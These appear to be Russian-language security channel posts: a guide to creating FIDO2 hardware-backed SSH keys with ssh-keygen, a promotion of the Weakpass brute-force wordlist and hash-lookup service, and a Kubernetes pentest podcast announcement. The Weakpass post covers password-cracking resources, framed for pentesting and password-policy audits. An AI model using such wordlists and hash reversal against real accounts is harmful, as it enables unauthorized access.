✅ FIDO2
Самый удобный способ, который не требует дополнительного ПО, так как нужна только версия OpenSSH 8.2p1 и выше. В соответствии со стандартом FIDO2 ключи могут храниться на самом девайсе и отдельно:

Резидентские ключи
ssh-keygen -t ed25519-sk -O resident -O application=my_secure_ssh_host -O verify-required
В данном случае ключ вообще никогда не покидает девайс и единственный недостаток это ограничение на кол-во слотов (на моем YubiKey 5 - 25 слотов) а также для более старыx версий прошивки, где используется CTAP (Client to Authenticator Protocol) v2.0 - это отсутствие возможности удалить только один ключ, вместо этого удалятся все 25🙈

Нерезидентские ключи
ssh-keygen -t ed25519-sk
Когда SSH сервер хочет аутентифицировать клиента, он отправляет Credential ID, это зашифрованная AES128 строка, которую расшифровать может только YubiKey, использованный при генерации ключа. Сам процесс происходит за счёт использования мастер-ключа уникального для каждого девайса, поэтому нерезидентские ключи не расходуют слоты и таким образом их количество неограниченно.

PurpleBear

25 октября 2024 09:51

Weakpass

Ресурс с огромной коллекцией словарей для брутфорса от моего бывшего коллеги Ивана Юшкевича, который используют в своей повседневной работе многие пентестеры по всему миру😎 теперь позволяет удобно искать значения по хешам (NTLM,MD5,SHA1,SHA256) в удобном и приятном веб-интерфейсе🔥

Все это доступно любому желающему абсолютно бесплатно, без ограничений на количество и надоедливых капчей. К тому же стоит отметить что поиск осуществляется исключительно client-side, ничего не отправляется на backend приложения.

У сервиса есть API для автоматизации и интеграции в собственные инструменты. А также ничего не мешает выгрузить все словари для создания внутренних инструментов для регулярных проверок на соответствие парольной политике вашей компании, чтобы больше никаких Companyname2024! или Winter2024! не использовались в качестве значений пароля для доменных учетных записей пользователей.

PurpleBear

15 октября 2024 13:19

Кто и зачем ломает контейнеры? Разбираемся в пентесте K8s

C моими хорошими друзьями Алексеем Федулаевым @ever_secure и Сергеем Канибором @k8security порассуждали на тему тестирований на проникновение кубовой инфраструктуры в подкасте SafeCode Live

Сломали вебчик, а что дальше? Мы оказываемся в контейнере внутри K8s. Что злоумышленник может сделать дальше и может ли вообще что-либо сделать?

А также обсудили: 
✅ отличия пентеста контейнеров от пентеста веба и инфраструктуры; 
✅ компетенции специалиста, который этим занимается;
✅ уязвимости и способы защитить контейнеры;
✅ истории из практики и многое другое

Приятного просмотра!

Аудио версия подкаста доступна на платформах:
— Apple Podcasts 
— Яндекс Музыка
— ВКонтакте